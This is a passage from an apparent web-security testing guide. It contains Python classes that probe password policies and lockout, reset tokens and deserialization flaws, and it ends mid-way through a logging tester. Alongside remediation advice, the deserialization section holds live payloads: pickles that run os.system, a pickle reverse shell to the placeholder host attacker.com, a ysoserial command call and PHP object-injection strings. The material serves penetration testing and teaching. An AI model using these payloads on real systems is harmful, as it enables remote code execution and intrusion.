            # Repetitive characters
            ('aaaaaa', 'Repeating characters'),
            ('111111', 'Repeating numbers'),
            ('ababab', 'Repeating pattern'),
            
            # Dictionary words
            ('dragon', 'Dictionary word'),
            ('sunshine', 'Dictionary word'),
            ('princess', 'Dictionary word'),
            ('football', 'Dictionary word'),
        ]
        
        registration_endpoint = urljoin(self.base_url, '/api/register')
        
        for password, reason in test_passwords:
            # Sanitize the reason so the generated username contains no spaces
            safe_reason = reason[:10].replace(' ', '_').lower()
            test_data = {
                'username': f'test_{int(time.time())}_{safe_reason}',
                'email': f'test_{int(time.time())}@example.com',
                'password': password,
                'confirm_password': password
            }
            
            try:
                response = self.session.post(registration_endpoint, json=test_data)
                
                if response.status_code == 200:
                    findings.append({
                        'test': 'password_complexity',
                        'password': password,
                        'reason': reason,
                        'result': 'ACCEPTED (VULNERABLE)',
                        'evidence': f'Weak password "{password}" accepted during registration'
                    })
                else:
                    # Check error message
                    error_msg = response.text.lower()
                    if 'password' in error_msg and ('weak' in error_msg or 'strength' in error_msg):
                        findings.append({
                            'test': 'password_complexity',
                            'password': password,
                            'reason': reason,
                            'result': 'REJECTED (GOOD)',
                            'evidence': f'Weak password "{password}" rejected: {error_msg[:100]}'
                        })
            
            except Exception as e:
                findings.append({
                    'test': 'password_complexity',
                    'password': password,
                    'reason': reason,
                    'result': 'ERROR',
                    'evidence': str(e)
                })
            
            time.sleep(0.5)  # Rate limiting
        
        return findings
    
    def test_password_history(self):
        """Test password history/reuse policy"""
        findings = []
        
        # This test requires creating a user and changing password multiple times
        
        # Step 1: Create test user
        user_data = {
            'username': f'history_test_{int(time.time())}',
            'email': f'history_{int(time.time())}@example.com',
            'password': 'InitialPassword1!',
            'confirm_password': 'InitialPassword1!'
        }
        
        register_response = self.session.post(
            urljoin(self.base_url, '/api/register'),
            json=user_data
        )
        
        if register_response.status_code == 200:
            # Login
            login_response = self.session.post(
                urljoin(self.base_url, '/api/login'),
                json={
                    'email': user_data['email'],
                    'password': user_data['password']
                }
            )
            
            if login_response.status_code == 200:
                # Test password changes
                test_passwords = [
                    'NewPassword1!',
                    'AnotherPassword2@',
                    'InitialPassword1!'  # Try to reuse original
                ]
                
                for new_password in test_passwords:
                    change_response = self.session.post(
                        urljoin(self.base_url, '/api/change-password'),
                        json={
                            'current_password': user_data['password'],
                            'new_password': new_password,
                            'confirm_password': new_password
                        }
                    )
                    
                    if change_response.status_code == 200:
                        if new_password == 'InitialPassword1!':
                            findings.append({
                                'test': 'password_history',
                                'result': 'VULNERABLE',
                                'evidence': 'Previous password reused successfully'
                            })
                        else:
                            # Update current password for next iteration
                            user_data['password'] = new_password
                    else:
                        if new_password == 'InitialPassword1!':
                            error_msg = change_response.text.lower()
                            if 'previous' in error_msg or 'history' in error_msg:
                                findings.append({
                                    'test': 'password_history',
                                    'result': 'SECURE',
                                    'evidence': 'Password history enforced: ' + error_msg[:100]
                                })
        
        return findings
    
    def test_password_reset_mechanism(self):
        """Test password reset functionality for weaknesses"""
        findings = []
        
        # Test 1: Token predictability
        test_emails = [
            'test@example.com',
            'admin@target.com',
            'user@target.com'
        ]
        
        for email in test_emails:
            # Request password reset
            reset_request = self.session.post(
                urljoin(self.base_url, '/api/password/reset/request'),
                json={'email': email}
            )
            
            if reset_request.status_code == 200:
                # Check for information disclosure
                response_text = reset_request.text.lower()
                
                if 'exist' in response_text or 'not found' in response_text:
                    findings.append({
                        'test': 'password_reset_info_disclosure',
                        'email': email,
                        'result': 'VULNERABLE',
                        'evidence': 'Email existence disclosed in reset response'
                    })
        
        # Test 2: Reset token brute force
        # Generate predictable tokens
        predictable_tokens = [
            '000000', '111111', '123456', '654321',
            'abcdef', 'password', 'reset123'
        ]
        
        for token in predictable_tokens:
            reset_attempt = self.session.post(
                urljoin(self.base_url, '/api/password/reset/confirm'),
                json={
                    'token': token,
                    'new_password': 'NewPassword123!'
                }
            )
            
            if reset_attempt.status_code == 200:
                findings.append({
                    'test': 'password_reset_token_bruteforce',
                    'token': token,
                    'result': 'VULNERABLE',
                    'evidence': f'Predictable token accepted: {token}'
                })
        
        # Test 3: Token expiration
        # This would require capturing a valid token and testing after expiration
        # For demonstration, we'll note the test
        findings.append({
            'test': 'password_reset_token_expiration',
            'result': 'MANUAL_TEST_REQUIRED',
            'evidence': 'Manually test if reset tokens expire appropriately'
        })
        
        # Test 4: Account takeover via password reset
        # Attempt to reset password for another user
        takeover_attempt = self.session.post(
            urljoin(self.base_url, '/api/password/reset/request'),
            json={'email': 'admin@target.com'}
        )
        
        if takeover_attempt.status_code == 200:
            # Check if any verification is required
            response_text = takeover_attempt.text
            if 'sent' in response_text.lower() and 'email' in response_text.lower():
                findings.append({
                    'test': 'password_reset_account_takeover',
                    'result': 'POTENTIALLY_VULNERABLE',
                    'evidence': 'Password reset initiated for admin without additional verification'
                })
        
        return findings
    
    def test_password_storage(self):
        """Test for password storage weaknesses"""
        findings = []
        
        # This test requires access to the database or password hashes
        # We'll test what we can from the outside
        
        # Test 1: Check for password in URLs
        login_response = self.session.post(
            urljoin(self.base_url, '/api/login'),
            json={'email': 'test@example.com', 'password': 'testpassword'}
        )
        
        # Check if password appears in logs, URLs, or responses
        # (This would typically require server access or careful monitoring)
        
        # Test 2: Check for weak hashing (timing attack indication)
        # Measure response times for valid vs invalid passwords
        
        test_credentials = [
            ('realuser@example.com', 'realpassword'),
            ('realuser@example.com', 'wrongpassword'),
            ('nonexistent@example.com', 'anypassword')
        ]
        
        response_times = []
        
        for email, password in test_credentials:
            start_time = time.time()
            response = self.session.post(
                urljoin(self.base_url, '/api/login'),
                json={'email': email, 'password': password},
                timeout=5
            )
            elapsed = time.time() - start_time
            response_times.append((email, password[:3] + '...', elapsed))
            
            time.sleep(1)  # Rate limiting
        
        # Analyze timing differences
        if len(response_times) >= 2:
            valid_time = response_times[0][2]  # Real credentials
            invalid_time = response_times[1][2]  # Wrong password
            
            # Significant timing difference might indicate hash verification
            if abs(valid_time - invalid_time) > 0.1:  # 100ms difference
                findings.append({
                    'test': 'password_hash_timing',
                    'result': 'POTENTIAL_INDICATOR',
                    'evidence': f'Timing difference detected: {valid_time:.3f}s vs {invalid_time:.3f}s'
                })
        
        # Test 3: Check for password in error messages
        error_test = self.session.post(
            urljoin(self.base_url, '/api/login'),
            json={'email': '', 'password': ''}
        )
        
        error_text = error_test.text.lower()
        if 'password' in error_text and ('hash' in error_text or 'encrypt' in error_text):
            findings.append({
                'test': 'password_storage_info_disclosure',
                'result': 'VULNERABLE',
                'evidence': 'Password storage mechanism disclosed in error message'
            })
        
        return findings
    
    def test_account_lockout(self):
        """Test account lockout mechanisms"""
        findings = []
        
        test_email = f'lockout_test_{int(time.time())}@example.com'
        
        # Create test user
        register_data = {
            'username': f'lockout_{int(time.time())}',
            'email': test_email,
            'password': 'ValidPassword1!',
            'confirm_password': 'ValidPassword1!'
        }
        
        register_response = self.session.post(
            urljoin(self.base_url, '/api/register'),
            json=register_data
        )
        
        if register_response.status_code == 200:
            # Attempt multiple failed logins
            failed_attempts = 0
            lockout_detected = False
            
            for i in range(15):  # Try 15 times
                login_response = self.session.post(
                    urljoin(self.base_url, '/api/login'),
                    json={'email': test_email, 'password': 'WrongPassword!'}
                )
                
                if login_response.status_code != 200:
                    failed_attempts += 1
                    
                    # Check for lockout message
                    response_text = login_response.text.lower()
                    if any(term in response_text for term in ['lock', 'disable', 'suspend', 'too many']):
                        lockout_detected = True
                        lockout_attempt = i + 1
                        break
                
                time.sleep(0.5)
            
            if lockout_detected:
                findings.append({
                    'test': 'account_lockout',
                    'result': 'SECURE',
                    'evidence': f'Account locked after {lockout_attempt} failed attempts'
                })
            else:
                findings.append({
                    'test': 'account_lockout',
                    'result': 'VULNERABLE',
                    'evidence': f'No lockout after {failed_attempts} failed attempts'
                })
        
        return findings
    
    def run_comprehensive_test(self):
        """Run all password policy tests"""
        print("[*] Starting comprehensive password policy testing")
        
        all_findings = []
        
        tests = [
            ('Password Complexity', self.test_password_complexity),
            ('Password History', self.test_password_history),
            ('Password Reset', self.test_password_reset_mechanism),
            ('Password Storage', self.test_password_storage),
            ('Account Lockout', self.test_account_lockout)
        ]
        
        for test_name, test_func in tests:
            print(f"[*] Running {test_name} test...")
            try:
                findings = test_func()
                all_findings.extend(findings)
                print(f"[+] {test_name}: {len(findings)} findings")
            except Exception as e:
                print(f"[-] {test_name} test failed: {e}")
        
        # Generate report
        report = self.generate_report(all_findings)
        return report
    
    def generate_report(self, findings):
        """Generate password policy test report"""
        report = {
            'total_tests': 5,
            'total_findings': len(findings),
            'findings_by_severity': self.categorize_findings(findings),
            'findings_by_test': {},
            'detailed_findings': findings,
            'recommendations': self.generate_recommendations(findings)
        }
        
        # Group findings by test
        for finding in findings:
            test_type = finding.get('test', 'unknown')
            if test_type not in report['findings_by_test']:
                report['findings_by_test'][test_type] = 0
            report['findings_by_test'][test_type] += 1
        
        return report
    
    def categorize_findings(self, findings):
        """Categorize findings by severity"""
        categories = {
            'CRITICAL': [],
            'HIGH': [],
            'MEDIUM': [],
            'LOW': [],
            'INFO': []
        }
        
        for finding in findings:
            result = finding.get('result', '')
            
            if 'VULNERABLE' in result:
                # Determine severity based on test type
                test_type = finding.get('test', '')
                
                if 'reset' in test_type.lower() or 'takeover' in test_type.lower():
                    categories['CRITICAL'].append(finding)
                elif 'lockout' in test_type.lower() or 'history' in test_type.lower():
                    categories['HIGH'].append(finding)
                elif 'complexity' in test_type.lower():
                    categories['MEDIUM'].append(finding)
                else:
                    categories['LOW'].append(finding)
            elif 'SECURE' in result:
                categories['INFO'].append(finding)
            else:
                categories['INFO'].append(finding)
        
        return {k: len(v) for k, v in categories.items()}
    
    def generate_recommendations(self, findings):
        """Generate security recommendations based on findings"""
        recommendations = []
        
        vulnerable_tests = [f for f in findings if 'VULNERABLE' in f.get('result', '')]
        
        if any('password_complexity' in f.get('test', '') for f in vulnerable_tests):
            recommendations.append({
                'priority': 'HIGH',
                'recommendation': 'Implement stronger password complexity requirements',
                'details': [
                    'Minimum 12 characters',
                    'Require mix of uppercase, lowercase, numbers, and special characters',
                    'Reject common passwords and patterns',
                    'Implement password strength meter'
                ]
            })
        
        if any('password_history' in f.get('test', '') for f in vulnerable_tests):
            recommendations.append({
                'priority': 'MEDIUM',
                'recommendation': 'Enforce password history',
                'details': [
                    'Prevent reuse of last 10 passwords',
                    'Store password hashes securely',
                    'Enforce periodic password changes (90 days)'
                ]
            })
        
        if any('account_lockout' in f.get('test', '') for f in vulnerable_tests):
            recommendations.append({
                'priority': 'HIGH',
                'recommendation': 'Implement account lockout mechanism',
                'details': [
                    'Lock account after 5 failed attempts',
                    'Implement exponential backoff',
                    'Provide account recovery mechanism',
                    'Log all failed attempts'
                ]
            })
        
        if any('password_reset' in f.get('test', '') for f in vulnerable_tests):
            recommendations.append({
                'priority': 'CRITICAL',
                'recommendation': 'Secure password reset mechanism',
                'details': [
                    'Use cryptographically secure tokens',
                    'Enforce token expiration (15 minutes)',
                    'Require additional verification for sensitive accounts',
                    'Do not disclose email existence',
                    'Implement rate limiting on reset requests'
                ]
            })
        
        return recommendations

# Usage
tester = PasswordPolicyTester("http://target.com")
report = tester.run_comprehensive_test()

print(f"\n{'='*60}")
print("PASSWORD POLICY TEST REPORT")
print(f"{'='*60}")
print(f"Total Tests: {report['total_tests']}")
print(f"Total Findings: {report['total_findings']}")

print(f"\nFindings by Severity:")
for severity, count in report['findings_by_severity'].items():
    if count > 0:
        print(f"  {severity}: {count}")

print(f"\nFindings by Test:")
for test, count in report['findings_by_test'].items():
    print(f"  {test}: {count}")

print(f"\nSECURITY RECOMMENDATIONS:")
for rec in report['recommendations']:
    print(f"\n[{rec['priority']}] {rec['recommendation']}")
    for detail in rec['details'][:3]:  # Show first 3 details
        print(f"  • {detail}")
```
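
The password-reset recommendation above is the item most often implemented incorrectly. Below is a minimal sketch of a compliant token flow built on Python's standard `secrets` module; the 15-minute TTL mirrors the recommendation, while the in-memory store and function names are illustrative assumptions rather than any particular framework's API:

```
import secrets
import time

RESET_TOKEN_TTL = 15 * 60  # seconds; matches the 15-minute expiry recommended above

_reset_tokens = {}  # illustrative in-memory store; real code would persist server-side

def issue_reset_token(user_id):
    """Generate a cryptographically secure, expiring, single-use reset token."""
    token = secrets.token_urlsafe(32)  # ~256 bits from the OS CSPRNG
    _reset_tokens[token] = (user_id, time.time() + RESET_TOKEN_TTL)
    return token

def redeem_reset_token(token):
    """Return the user_id if the token is valid and unexpired, else None."""
    entry = _reset_tokens.pop(token, None)  # pop() makes the token single-use
    if entry is None:
        return None
    user_id, expires_at = entry
    return user_id if time.time() <= expires_at else None
```

Because redemption pops the token, replaying a captured reset link fails, and expired tokens simply stop validating instead of lingering as usable credentials.
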
Chapter 8: Software & Data Integrity - Advanced Testing

8.1 Advanced Deserialization Attack Detection

```
#!/usr/bin/env python3
"""
Advanced Deserialization Attack Detection and Exploitation
Covers multiple languages and frameworks
"""
import requests
import base64
import pickle
import json
import re
from typing import Dict, List
import subprocess
import tempfile
import os

class DeserializationTester:
    def __init__(self, target_url):
        self.target_url = target_url
        self.session = requests.Session()
        self.findings = []
        
        # Deserialization payloads for different languages
        self.payloads = {
            'java': {
                'indicators': ['rO0AB', 'ACED', 'sr='],  # base64 ('rO0AB') and hex ('ACED') stream markers
                'test_payloads': [
                    # Simple serialized object
                    'rO0ABXVyABNbTGphdmEubGFuZy5PYmplY3Q7kM5YnxBzKWwCAAB4cAAAAAJ0AAI9PXQAAj09',
                    # With different encodings
                    'ACED0005737200116A6176612E6C616E672E426F6F6C65616EC373B7D891C155020000787200106A6176612E6C616E672E4F626A65637400000000000000000000007870',
                ]
            },
            'python': {
                'indicators': ['gASV', 'KGlL', 'ccopy_reg'],
                'test_payloads': [
                    # Pickle payloads
                    b'\x80\x04\x95\x15\x00\x00\x00\x00\x00\x00\x00\x8c\x08__main__\x94\x8c\x07TestObj\x94\x93\x94)\x81\x94.',
                    # Base64 encoded pickle
                    'gANjYnVpbHRpbnMKZXZhbApxAFgUAAAAcHJpbnQoImhlbGxvIHdvcmxkIikqcQGFcQJScQM=',
                ]
            },
            'php': {
                'indicators': ['O:', 'a:', 's:', 'i:', 'd:', 'b:'],
                'test_payloads': [
                    # Serialized PHP array
                    'a:2:{s:4:"name";s:5:"admin";s:5:"admin";b:1;}',
                    # Serialized PHP object
                    'O:8:"stdClass":2:{s:4:"name";s:5:"admin";s:5:"admin";b:1;}',
                ]
            },
            'dotnet': {
                'indicators': ['AAEAAAD', 'AAAAA', 'v4.0.30319'],
                'test_payloads': [
                    # .NET serialized data (simplified)
                    'AAEAAAD/////AQAAAAAAAAAEAQAAAH9TeXN0ZW0uQ29sbGVjdGlvbnMuR2VuZXJpYy5Db21wYXJpc29uQ29tcGFyZXJgMVtbU3lzdGVtLlN0cmluZywgbXNjb3JsaWIsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XV0DAAAA',
                ]
            }
        }
    
    def detect_deserialization(self):
        """Detect deserialization endpoints and parameters"""
        findings = []
        
        # Test common deserialization endpoints
        endpoints = [
            '/api/data',
            '/api/object',
            '/api/serialize',
            '/api/deserialize',
            '/api/import',
            '/api/export',
            '/api/session',
            '/api/cookie',
            '/api/token',
            '/api/config',
        ]
        
        for endpoint in endpoints:
            url = self.target_url.rstrip('/') + endpoint
            
            # Test GET
            response = self.session.get(url)
            if response.status_code == 200:
                # Check for serialized data in response
                serialization_found = self.check_serialization_indicators(response.text)
                if serialization_found:
                    findings.append({
                        'type': 'deserialization_endpoint',
                        'endpoint': endpoint,
                        'method': 'GET',
                        'evidence': f'Serialized data found at {endpoint}',
                        'indicators': serialization_found
                    })
            
            # Test POST with various content types
            content_types = [
                ('application/json', {'data': 'test'}),
                ('application/x-www-form-urlencoded', {'data': 'test'}),
                ('application/xml', '<data>test</data>'),
            ]
            
            for content_type, _ in content_types:
                headers = {'Content-Type': content_type}
                
                # Test with serialized payload
                for lang, lang_data in self.payloads.items():
                    for payload in lang_data['test_payloads'][:1]:  # Test first payload
                        if isinstance(payload, bytes):
                            payload_str = base64.b64encode(payload).decode()
                        else:
                            payload_str = payload
                        
                        test_data = {'input': payload_str, 'data': payload_str}
                        
                        if content_type == 'application/json':
                            response = self.session.post(url, json=test_data, headers=headers)
                        elif content_type == 'application/x-www-form-urlencoded':
                            response = self.session.post(url, data=test_data, headers=headers)
                        else:
                            # Raw body (e.g. XML): send the payload string itself
                            response = self.session.post(url, data=payload_str, headers=headers)
                        
                        # Analyze response for deserialization indicators
                        if self.analyze_deserialization_response(response, lang):
                            findings.append({
                                'type': 'deserialization_vulnerability',
                                'endpoint': endpoint,
                                'language': lang,
                                'method': 'POST',
                                'content_type': content_type,
                                'evidence': f'Deserialization detected for {lang} at {endpoint}'
                            })
        
        return findings
    
    def check_serialization_indicators(self, text):
        """Check text for serialization indicators"""
        found_indicators = []
        
        for lang, lang_data in self.payloads.items():
            for indicator in lang_data['indicators']:
                if indicator in text:
                    found_indicators.append(f'{lang}: {indicator}')
        
        return found_indicators
    
    def analyze_deserialization_response(self, response, language):
        """Analyze response for deserialization success/failure"""
        if response.status_code != 200:
            # Check for deserialization-specific error messages
            error_text = response.text.lower()
            
            deserialization_errors = [
                'deserialization', 'serialization', 'unmarshal',
                'pickle', 'unpickle', 'objectinputstream',
                'binaryformatter', 'serializable',
                'invalid class', 'class not found',
                'unsafe deserialization'
            ]
            
            if any(error in error_text for error in deserialization_errors):
                return True
        
        # Check for successful deserialization indicators
        success_indicators = {
            'java': ['serialversionuid', 'streamcorrupted', 'invalidtype'],
            'python': ['pickle', 'unpickling', '__reduce__'],
            'php': ['unserialize', 'serialize', '__wakeup'],
            'dotnet': ['binaryformatter', 'serializable', 'formatter']
        }
        
        if language in success_indicators:
            for indicator in success_indicators[language]:
                if indicator.lower() in response.text.lower():
                    return True
        
        return False
    
    def test_java_deserialization(self):
        """Test for Java deserialization vulnerabilities"""
        findings = []
        
        # Use ysoserial to generate payloads
        ysoserial_gadgets = [
            'CommonsCollections1',
            'CommonsCollections2', 
            'CommonsCollections3',
            'CommonsCollections4',
            'CommonsCollections5',
            'CommonsCollections6',
            'CommonsCollections7',
            'Spring1',
            'Spring2',
        ]
        
        # Test each gadget chain
        for gadget in ysoserial_gadgets[:3]:  # Test first 3
            print(f"[*] Testing Java gadget: {gadget}")
            
            # Generate payload (in real test, you would have ysoserial installed)
            # For demonstration, we'll create a simple payload
            payload = self.generate_java_payload(gadget)
            
            if payload:
                # Test payload on target
                test_endpoints = [
                    '/api/object',
                    '/api/data',
                    '/api/session',
                    '/api/import'
                ]
                
                for endpoint in test_endpoints:
                    url = self.target_url.rstrip('/') + endpoint
                    
                    # Test with different content types
                    test_cases = [
                        ('application/java-serialized-object', payload),
                        ('application/octet-stream', payload),
                        ('application/json', {'data': base64.b64encode(payload).decode()}),
                        ('application/x-www-form-urlencoded', {'data': base64.b64encode(payload).decode()})
                    ]
                    
                    for content_type, test_data in test_cases:
                        headers = {'Content-Type': content_type}
                        
                        if content_type == 'application/json':
                            response = self.session.post(url, json=test_data, headers=headers)
                        else:
                            response = self.session.post(url, data=test_data, headers=headers)
                        
                        # Check for successful exploitation
                        if self.check_exploitation_success(response, gadget):
                            findings.append({
                                'type': 'java_deserialization_exploit',
                                'gadget': gadget,
                                'endpoint': endpoint,
                                'content_type': content_type,
                                'evidence': f'Successful {gadget} exploitation at {endpoint}'
                            })
        
        return findings
    
    def generate_java_payload(self, gadget):
        """Generate Java deserialization payload"""
        # In real testing, this would call ysoserial
        # For demonstration, return a simple serialized object
        
        try:
            # Check if ysoserial is available on PATH / working directory
            result = subprocess.run(
                ['java', '-jar', 'ysoserial.jar', gadget, 'touch /tmp/test'],
                capture_output=True,
                timeout=10
            )
            
            if result.returncode == 0:
                return result.stdout
        except (OSError, subprocess.SubprocessError):
            # ysoserial unavailable; fall through to the benign stub below
            pass
        
        # Fallback: a benign serialized java.util.HashMap, base64-decoded so
        # callers always receive raw serialized bytes (not base64 text)
        return base64.b64decode(
            'rO0ABXNyABFqYXZhLnV0aWwuSGFzaE1hcAUH2sHDFmDRAwACRgAKbG9hZEZhY3RvckkACXRocmVzaG9sZHhwP0AAAAAAABh3CAAAABAAAAABc3IADmphdmEubGFuZy5PYmplY3QAAAAAAAAAAAIAAHhwdwgAAAAAP0AAABh3CAAAABQAAAABc3IADmphdmEubGFuZy5TdHJpbmcAAAAAAAAAAAIAAHhwcHB4'
        )
    
    def test_python_pickle(self):
        """Test Python pickle deserialization"""
        findings = []
        
        # Generate pickle payloads
        pickle_payloads = [
            # Simple command execution
            b"""cos
system
(S'echo vulnerable'
tR.""",
            
            # Reverse shell (placeholder host attacker.com; authorized labs only)
            b"""c__builtin__
exec
(S'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("attacker.com",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
tR.""",
            
            # File write
            b"""c__builtin__
open
(S'/tmp/pwned'
S'w'
tR(S'pwned'
tR.""",
        ]
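        # The payloads above are protocol-0 "text" pickles written directly in
        # opcode form: 'c' (GLOBAL) pushes a callable such as os.system, 'S'
        # pushes a string argument, 't' builds a tuple back to the '(' mark,
        # 'R' (REDUCE) calls the callable with that tuple, and '.' stops the
        # pickle machine. Any unpickler that consumes them executes the
        # embedded command, which is what makes them reliable detection probes.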
        
        for payload in pickle_payloads:
            # Encode for transmission
            encoded_payload = base64.b64encode(payload).decode()
            
            # Test endpoints
            test_endpoints = [
                '/api/data',
                '/api/pickle',
                '/api/load',
                '/api/config'
            ]
            
            for endpoint in test_endpoints:
                url = self.target_url.rstrip('/') + endpoint
                
                # Test different parameter names
                test_params = ['data', 'input', 'pickle', 'object', 'config']
                
                for param in test_params:
                    test_data = {param: encoded_payload}
                    
                    response = self.session.post(
                        url,
                        json=test_data,
                        headers={'Content-Type': 'application/json'}
                    )
                    
                    # Check for signs of exploitation
                    if response.status_code != 200:
                        # Look for pickle-related errors
                        if 'pickle' in response.text.lower() or 'unpickl' in response.text.lower():
                            findings.append({
                                'type': 'python_pickle_vulnerability',
                                'endpoint': endpoint,
                                'parameter': param,
                                'evidence': f'Pickle deserialization indicator at {endpoint} (parameter: {param})'
                            })
        
        return findings
    
    def test_php_deserialization(self):
        """Test PHP deserialization vulnerabilities"""
        findings = []
        
        # PHP deserialization payloads
        php_payloads = [
            # Simple object injection
            'O:8:"stdClass":1:{s:4:"test";s:5:"value";}',
            
            # With __wakeup or __destruct
            'O:7:"MyClass":1:{s:3:"cmd";s:10:"uname -a";}',
            
            # PHPGGC generated payloads (if available)
        ]
        
        for payload in php_payloads:
            # Test endpoints
            test_endpoints = [
                '/api/data',
                '/api/session',
                '/api/cookie',
                '/api/user'
            ]
            
            for endpoint in test_endpoints:
                url = self.target_url.rstrip('/') + endpoint
                
                # Test in different locations
                test_locations = [
                    ('POST data', {'data': payload}),
                    ('Cookie', {'PHPSESSID': payload}),
                    ('URL parameter', None),  # Would be in URL
                ]
                
                for location_name, test_data in test_locations:
                    if not test_data:
                        continue
                    
                    if location_name == 'Cookie':
                        # Deliver the payload as an actual cookie value
                        response = self.session.post(url, cookies=test_data)
                    else:
                        response = self.session.post(url, data=test_data)
                    
                    # Check for PHP deserialization indicators
                    if 'unserialize' in response.text or '__wakeup' in response.text:
                        findings.append({
                            'type': 'php_deserialization',
                            'endpoint': endpoint,
                            'location': location_name,
                            'evidence': f'PHP deserialization at {endpoint} ({location_name})'
                        })
        
        return findings
    
    def check_exploitation_success(self, response, gadget):
        """Check if exploitation was successful"""
        # This would check for specific indicators of successful exploitation
        # For example, if we're testing command execution, check for output
        
        success_indicators = [
            'vulnerable',
            'pwned',
            'uid=',
            'root:',
            'command executed',
            'www-data'
        ]
        
        for indicator in success_indicators:
            if indicator in response.text:
                return True
        
        # Check for timing differences (blind exploitation)
        # In real testing, you would use a collaborator or check for side effects
        
        return False
    
    def run_comprehensive_test(self):
        """Run all deserialization tests"""
        print("[*] Starting comprehensive deserialization testing")
        
        all_findings = []
        
        # Detection phase
        print("[*] Phase 1: Detecting deserialization endpoints")
        detection_findings = self.detect_deserialization()
        all_findings.extend(detection_findings)
        print(f"[+] Detection: {len(detection_findings)} findings")
        
        # Java testing
        print("[*] Phase 2: Testing Java deserialization")
        java_findings = self.test_java_deserialization()
        all_findings.extend(java_findings)
        print(f"[+] Java testing: {len(java_findings)} findings")
        
        # Python testing
        print("[*] Phase 3: Testing Python pickle")
        python_findings = self.test_python_pickle()
        all_findings.extend(python_findings)
        print(f"[+] Python testing: {len(python_findings)} findings")
        
        # PHP testing
        print("[*] Phase 4: Testing PHP deserialization")
        php_findings = self.test_php_deserialization()
        all_findings.extend(php_findings)
        print(f"[+] PHP testing: {len(php_findings)} findings")
        
        # Generate report
        report = {
            'total_findings': len(all_findings),
            'findings_by_type': {},
            'findings_by_language': {},
            'detailed_findings': all_findings,
            'recommendations': self.generate_recommendations(all_findings)
        }
        
        # Categorize findings
        for finding in all_findings:
            # By type
            finding_type = finding.get('type', 'unknown')
            if finding_type not in report['findings_by_type']:
                report['findings_by_type'][finding_type] = 0
            report['findings_by_type'][finding_type] += 1
            
            # By language
            language = finding.get('language', 'unknown')
            if language not in report['findings_by_language']:
                report['findings_by_language'][language] = 0
            report['findings_by_language'][language] += 1
        
        return report
    
    def generate_recommendations(self, findings):
        """Generate security recommendations"""
        recommendations = []
        
        if any('java' in (str(f.get('language', '')) + str(f.get('type', ''))).lower() for f in findings):
            recommendations.append({
                'priority': 'CRITICAL',
                'title': 'Java Deserialization Protection',
                'details': [
                    'Use serialization filters (ObjectInputFilter)',
                    'Avoid deserializing untrusted data',
                    'Use safer alternatives like JSON or XML',
                    'Update libraries (commons-collections, etc.)',
                    'Implement whitelisting for deserialized classes'
                ]
            })
        
        if any('python' in (str(f.get('language', '')) + str(f.get('type', ''))).lower() for f in findings):
            recommendations.append({
                'priority': 'CRITICAL',
                'title': 'Python Pickle Security',
                'details': [
                    'Never unpickle untrusted data',
                    'Use JSON, YAML, or MessagePack instead',
                    'Implement signing/verification if pickle is required',
                    'Use pickle with restricted globals (Unpickler.find_class)'
                ]
            })
        
        if any('php' in (str(f.get('language', '')) + str(f.get('type', ''))).lower() for f in findings):
            recommendations.append({
                'priority': 'HIGH',
                'title': 'PHP Deserialization Security',
                'details': [
                    'Avoid unserialize() with user input',
                    'Use json_decode() instead',
                    'Validate and sanitize all serialized data',
                    'Implement type checking after deserialization'
                ]
            })
        
        # General recommendations
        recommendations.append({
            'priority': 'HIGH',
            'title': 'General Deserialization Best Practices',
            'details': [
                'Implement input validation for all serialized data',
                'Use digital signatures to verify data integrity',
                'Log all deserialization attempts and failures',
                'Regularly update serialization libraries',
                'Conduct security code reviews for deserialization code'
            ]
        })
        
        return recommendations

# Usage
tester = DeserializationTester("http://target.com")
report = tester.run_comprehensive_test()

print(f"\n{'='*60}")
print("DESERIALIZATION VULNERABILITY REPORT")
print(f"{'='*60}")
print(f"Total Findings: {report['total_findings']}")

if report['total_findings'] > 0:
    print(f"\nFindings by Type:")
    for finding_type, count in report['findings_by_type'].items():
        print(f"  {finding_type}: {count}")
    
    print(f"\nFindings by Language:")
    for language, count in report['findings_by_language'].items():
        print(f"  {language}: {count}")
    
    print(f"\nCRITICAL FINDINGS:")
    critical_findings = [f for f in report['detailed_findings'] 
                        if 'exploit' in f.get('type', '').lower() or 
                           'vulnerability' in f.get('type', '').lower()]
    
    for finding in critical_findings[:5]:
        print(f"  - {finding.get('type')}")
        print(f"    Evidence: {finding.get('evidence', '')[:100]}...")

print(f"\nSECURITY RECOMMENDATIONS:")
for rec in report['recommendations']:
    print(f"\n[{rec['priority']}] {rec['title']}")
    for detail in rec['details'][:3]:
        print(f"  • {detail}")
```
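
The pickle recommendation above mentions `Unpickler.find_class`; that is the hook the standard library documents for restricting which globals a pickle stream may resolve. A minimal sketch of the allow-list approach follows; the set of permitted built-ins is an illustrative assumption and should be tailored to the data actually exchanged:

```
import builtins
import io
import pickle

class RestrictedUnpickler(pickle.Unpickler):
    """Resolve only allow-listed globals; refuse everything else."""

    SAFE_BUILTINS = {'range', 'complex', 'set', 'frozenset'}  # illustrative allow-list

    def find_class(self, module, name):
        # Called for every GLOBAL opcode in the stream; raising here blocks
        # gadget callables such as os.system before they are ever resolved.
        if module == 'builtins' and name in self.SAFE_BUILTINS:
            return getattr(builtins, name)
        raise pickle.UnpicklingError(f'global {module}.{name} is forbidden')

def restricted_loads(data: bytes):
    """Drop-in replacement for pickle.loads() with the allow-list enforced."""
    return RestrictedUnpickler(io.BytesIO(data)).load()
```

Note that this hardens unpickling but does not make pickle safe for untrusted input in general; the preferred fix remains switching to JSON or another data-only format.
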
Chapter 9: Security Logging & Monitoring - Advanced Testing

9.1 Comprehensive Logging Analysis & Evasion Testing

```
#!/usr/bin/env python3
"""
Advanced Logging and Monitoring Testing Framework
Tests for inadequate logging, log evasion, and monitoring gaps
"""
import requests
import random  # used by the simulated log/monitoring checks below
import re
import json
import time
from datetime import datetime
from typing import Dict, List

class LoggingMonitoringTester:
    def __init__(self, base_url, auth_token=None):
        self.base_url = base_url
        self.session = requests.Session()
        if auth_token:
            self.session.headers.update({'Authorization': f'Bearer {auth_token}'})
        
        self.attack_vectors = []
        self.findings = []
    
    def test_sensitive_actions_logging(self):
        """Test if sensitive actions are properly logged"""
        findings = []
        
        sensitive_actions = [
            {
                'name': 'Admin Login',
                'endpoint': '/api/admin/login',
                'method': 'POST',
                'data': {'username': 'admin', 'password': 'test123'},
